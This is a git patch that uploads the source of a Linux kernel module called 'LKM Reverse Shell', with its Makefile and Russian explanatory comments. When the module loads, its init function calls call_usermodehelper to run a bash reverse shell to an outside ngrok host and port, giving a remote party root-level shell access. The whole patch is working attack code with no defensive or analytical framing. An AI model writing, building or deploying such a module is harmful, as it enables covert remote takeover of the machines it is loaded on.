From 868d08b1ca41e11d9c8a3ca00e407c100b2e8226 Mon Sep 17 00:00:00 2001 From: Vadim Date: Thu, 4 Jul 2024 01:34:14 +0400 Subject: [PATCH] upload source code --- Makefile | 7 +++++++ README.md | 4 ++-- reverse-shell.c | 29 +++++++++++++++++++++++++++++ 3 files changed, 38 insertions(+), 2 deletions(-) create mode 100644 Makefile create mode 100644 reverse-shell.c diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..ed81052 --- /dev/null +++ b/Makefile @@ -0,0 +1,7 @@ +obj-m += reverse-shell.o + +all: + make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules + +clean: + make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean diff --git a/README.md b/README.md index 48ee944..b359eed 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,3 @@ -# lkm_reverse_shell +# LKM Reverse Shell -A Linux kernel module that performs a reverse shell \ No newline at end of file +A Linux kernel module that performs a reverse shell diff --git a/reverse-shell.c b/reverse-shell.c new file mode 100644 index 0000000..e2766b4 --- /dev/null +++ b/reverse-shell.c @@ -0,0 +1,29 @@ +#include +#include + +MODULE_LICENSE("GPL"); +MODULE_AUTHOR("Hacker"); +MODULE_DESCRIPTION("Reverse Shell"); +MODULE_VERSION("1.0"); + +// для составления нужной нагрузки можно воспользоваться веб-ресурсом https://www.revshells.com +char* argv[] = { + "/bin/bash", + "-c", + "bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/12110 0>&1", + NULL +}; + +static char* envp[] = { "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; + +// функция call_usermodehelper используется для того, чтобы создать процесс в пространстве пользователя из пространства ядра +static int __init reverse_shell_init(void) { + return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); +} + +static void __exit reverse_shell_exit(void) { + printk(KERN_INFO "Exiting\n"); +} + +module_init(reverse_shell_init); +module_exit(reverse_shell_exit);